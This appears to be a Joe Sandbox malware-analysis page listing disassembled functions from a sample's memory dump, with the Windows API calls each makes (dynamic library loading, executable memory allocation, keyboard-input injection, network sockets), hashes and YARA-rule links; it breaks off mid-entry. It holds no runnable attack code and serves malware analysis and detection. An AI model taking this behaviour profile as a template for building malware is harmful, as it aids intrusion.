Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 496d3f5d21c66b8413d31020e01aba72a52b9bbbf17200ce148f6bf6bade7af1
Instruction ID: e940d06bbd7acf0db48d800c7ddc01adf36465a988db2579d3b6c48f271d566a
Opcode Fuzzy Hash: 496d3f5d21c66b8413d31020e01aba72a52b9bbbf17200ce148f6bf6bade7af1
Instruction Fuzzy Hash: 52D0A7799003128FD7609F21F909B9376D4EB1430AB10443FE44DD2258D7F8C4C0861C

Function 0046BF55 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0046BF4B,?,0046AEE6), ref: 0046BF63
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0046BF75

Strings

kernel32.dll, xrefs: 0046BF5E
GetModuleHandleExW, xrefs: 0046BF6F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: ce8c049e748c783515838757de31c5797c3a048c2fb14bdcc66542a56dc5ada8
Instruction ID: cff866498e0950c101d6351e6edb818ca895dc8154f3bfa332393458b04d1b84
Opcode Fuzzy Hash: ce8c049e748c783515838757de31c5797c3a048c2fb14bdcc66542a56dc5ada8
Instruction Fuzzy Hash: 1BD0A739814322CFD7205F70FE0AB8236D9EB24301B10447FE885D2264EBB8D4C08A5C

Function 0041AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00466AA6), ref: 0041AB2D
_wcscmp.LIBCMT ref: 0041AB49

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharUpper_wcscmp
String ID:
API String ID: 820872866-0
Opcode ID: 17aef4e5c1a642fc4092ead893ce8fe9adf373a54808fb14f2d4fc24c22c6848
Instruction ID: a1b746ad29e6e035e5d87886fb396a415ba6bb14990b4e47e0710f769c3777a4
Opcode Fuzzy Hash: 17aef4e5c1a642fc4092ead893ce8fe9adf373a54808fb14f2d4fc24c22c6848
Instruction Fuzzy Hash: 4EA11670702107DBDB15EF65E9856AEB7B1FF44300F64416BED5683290EB38A8B1C78A

Function 00470D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00470D85
CharLowerBuffW.USER32(?,?), ref: 00470DC8

Part of subcall function 00470458: CharLowerBuffW.USER32(?,?,?,?), ref: 00470478

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00470FB2
_memmove.LIBCMT ref: 00470FC2

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 4470b7b9abd4151ca559795ba421e0f6d3a33f9b8a78078a43d204cce35cf741
Instruction ID: b8971628b9a27c6bf5556e680fc56270c03cefefaff060154c8e1a083768718c
Opcode Fuzzy Hash: 4470b7b9abd4151ca559795ba421e0f6d3a33f9b8a78078a43d204cce35cf741
Instruction Fuzzy Hash: 82B17E71604300DFC714DF28C48099AB7E4EF89718F14896EF8899B352DB79ED46CB96

Function 004342EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00434347
_memcpy_s.LIBCMT ref: 004343B9
__filbuf.LIBCMT ref: 0043443A
_memset.LIBCMT ref: 0043447E

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction ID: 76e0c88d0b7ec8b4c340cb6bea95329d4ce385cd133c655a1b4d523bb7035a74
Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction Fuzzy Hash: 1351D330B002059BDB249EA988806EF77A1AF98324F24973FF835972D0D778ED518B49

Function 0047C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0047C354
ScreenToClient.USER32(?,00000002), ref: 0047C384
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0047C3EA

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 0ef9e511977350df4d5e55820ad1588edac0808d85866681f701bcccb5aa1b3a
Instruction ID: 6f792e9683f76ad1f6f9f369caabbb1e5f485aea83584ed94ab60516c3866144
Opcode Fuzzy Hash: 0ef9e511977350df4d5e55820ad1588edac0808d85866681f701bcccb5aa1b3a
Instruction Fuzzy Hash: DF513C71900204AFCF20DF68D8C0AEE7BA6AB45364F20C56AF9299B291D774DD41CB94

Function 0044D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0044D258
__itow.LIBCMT ref: 0044D292

Part of subcall function 0044D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0044D549

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0044D2FB
__itow.LIBCMT ref: 0044D350

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 641ae02820b4f74bd9b3ed419706bbc50fb81e9b5176c48695581c407cce2840
Instruction ID: 7d35994aedc423373fe6e3ec0a6e101be36d82a672432241ba68a0495b260f2b
Opcode Fuzzy Hash: 641ae02820b4f74bd9b3ed419706bbc50fb81e9b5176c48695581c407cce2840
Instruction Fuzzy Hash: 6D419871A002096BEF11DF55C842BEF7BB5AF48704F00006BFA05A7291DBB89A45C75A

Function 0045EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0045EF32
GetLastError.KERNEL32(?,00000000), ref: 0045EF58
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0045EF7D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0045EFA9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c586b8c67f4a95838d94514a21dbb7ba915e255698852e6432740bf4c1ece0f8
Instruction ID: a827eea621db8ea8ce3267448d94c0090d38475969deb66e6a9cd81710a240a6
Opcode Fuzzy Hash: c586b8c67f4a95838d94514a21dbb7ba915e255698852e6432740bf4c1ece0f8
Instruction Fuzzy Hash: 01416E35600611DFCB10EF16C545A49BBE5EF89324B14809EEC4AAF362DB38FD40CB89

Function 0047B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0047B3E1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: bf5ce7357cef6885e19766e7bc99ac07a880aaa576a21eec6443466db138e8f0
Instruction ID: 9be9ac89d0ed668281cd725d470077099035d61cdbce76cc7b366922ca069268
Opcode Fuzzy Hash: bf5ce7357cef6885e19766e7bc99ac07a880aaa576a21eec6443466db138e8f0
Instruction Fuzzy Hash: 2C31C234600204FBEF249E58DC89BE937A5EB05350F54C523FE59D72A2C738D9819BDA

Function 0047D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0047D617
GetWindowRect.USER32(?,?), ref: 0047D68D
PtInRect.USER32(?,?,0047EB2C), ref: 0047D69D
MessageBeep.USER32(00000000), ref: 0047D70E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c3b9903f426ca5483fe57afddb5d06de33f28784fb6b19186e17d88a16fe9b3b
Instruction ID: 91ae28a889943393f9581bd764c0b455a2509aebbadb684b9865239d2c13a5a8
Opcode Fuzzy Hash: c3b9903f426ca5483fe57afddb5d06de33f28784fb6b19186e17d88a16fe9b3b
Instruction Fuzzy Hash: 1C415930A10118EFCB15DF99D884BEA7BF5BF49310F1881ABE80E9B261D734E841DB58

Function 00454497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 004544EE
SetKeyboardState.USER32(00000080,?,00008000), ref: 0045450A
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0045456A
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 004545C8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c1cf6b12d1efbc9694d8a81dd551e23ae95372287824a76d8db98d2f4c73a37b
Instruction ID: ef0ba82f8765e4e9e2f101c20b58fdc6b10f3a1416241c93276cd2a533240f3c
Opcode Fuzzy Hash: c1cf6b12d1efbc9694d8a81dd551e23ae95372287824a76d8db98d2f4c73a37b
Instruction Fuzzy Hash: 7B31187190025C7BEF248B6488087FF7BA59B8531AF04012BFA815A2C3E77C8A8DC759

Function 00444DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00444DE8
__isleadbyte_l.LIBCMT ref: 00444E16
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00444E44
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00444E7A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: afdaa5f4cbab211a6be3c9a7c275cf9f075e4752cc66016ab6c44176b661dd23
Instruction ID: 8aadd94ca996d4fc9d61909a5fcf4aeaac1fd621b641368b8519c8b290be01df
Opcode Fuzzy Hash: afdaa5f4cbab211a6be3c9a7c275cf9f075e4752cc66016ab6c44176b661dd23
Instruction Fuzzy Hash: 9031E131A00216AFEF218F75C845BAB7BA5FF81314F25442AE821872A1E738D851DB94

Function 00477AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00477AB6

Part of subcall function 004569C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 004569E3
Part of subcall function 004569C9: GetCurrentThreadId.KERNEL32 ref: 004569EA
Part of subcall function 004569C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004569F1

GetCaretPos.USER32(?), ref: 00477AC7
ClientToScreen.USER32(00000000,?), ref: 00477B00
GetForegroundWindow.USER32 ref: 00477B06

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 1538734f351f030a3fd8d4caa351f7bb2bc33a067b5399a07ed8c58e71d3e3a4
Instruction ID: 84b45b9bbd8760b597212a211803d03316971230538209b8b553f929b180e952
Opcode Fuzzy Hash: 1538734f351f030a3fd8d4caa351f7bb2bc33a067b5399a07ed8c58e71d3e3a4
Instruction Fuzzy Hash: 21314471D00118AFDB00EFB6DD818EFBBF9EF58314B50806BE815E3211D6749E058B94

Function 0046497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004649B7

Part of subcall function 00464A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00464A60
Part of subcall function 00464A41: InternetCloseHandle.WININET(00000000), ref: 00464AFD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: e86baeecbf28616869b96436c17e1deab24dec25691a6324c9533928db2a50f1
Instruction ID: 7ce524599640c5f91a71ad216070ec014a49025af723acffd01a08a8496308ae
Opcode Fuzzy Hash: e86baeecbf28616869b96436c17e1deab24dec25691a6324c9533928db2a50f1
Instruction Fuzzy Hash: 6721C571240605BBDF129FA0CC00F7BB7A9FB94700F14402FFA0596650FB759411975A

Function 0046900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0046906D
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 0046907F
accept.WS2_32(00000000,00000000,00000000), ref: 0046908C
WSAGetLastError.WS2_32(00000000), ref: 004690A3

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 24fed1066771bd0d86018a4fd263247e4169db7e8c9d13ae92a366d20bd9bc5e
Instruction ID: fd252561a1313f0a2442f65c3c4458d71ed31d412dc2c24846c138f8254e1b75
Opcode Fuzzy Hash: 24fed1066771bd0d86018a4fd263247e4169db7e8c9d13ae92a366d20bd9bc5e
Instruction Fuzzy Hash: 2C215475A00124AFC710DF69DC85A9ABBFCEF49710F0081BBF849D7291D6749E41CB95

Function 00478834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004788A3
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004788BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004788CB
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004788D9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: a25ed95f36ee3510ae1d456c654d89cc4f9d608880a8cf79e2eb08630de0073c
Instruction ID: 0b6480d2d63a988509cecb0ccdaf4f970b9443e15179a51bc3761963f9652b40
Opcode Fuzzy Hash: a25ed95f36ee3510ae1d456c654d89cc4f9d608880a8cf79e2eb08630de0073c
Instruction Fuzzy Hash: 8311D231780110AFDB04AB24CC09FFA77A9EF45324F04812EF81AC72A1CB68AC40C799

Function 004518E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00452CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004518FD,?,?,?,004526BC,00000000,000000EF,00000119,?,?), ref: 00452CB9
Part of subcall function 00452CAA: lstrcpyW.KERNEL32(00000000,?,?,004518FD,?,?,?,004526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00452CDF
Part of subcall function 00452CAA: lstrcmpiW.KERNEL32(00000000,?,004518FD,?,?,?,004526BC,00000000,000000EF,00000119,?,?), ref: 00452D10

lstrlenW.KERNEL32(?,00000002,?,?,?,?,004526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00451916
lstrcpyW.KERNEL32(00000000,?,?,004526BC,00000000,000000EF,00000119,?,?,00000000), ref: 0045193C
lstrcmpiW.KERNEL32(00000002,cdecl,?,004526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00451970

Strings

cdecl, xrefs: 00451967

Memory Dump Source

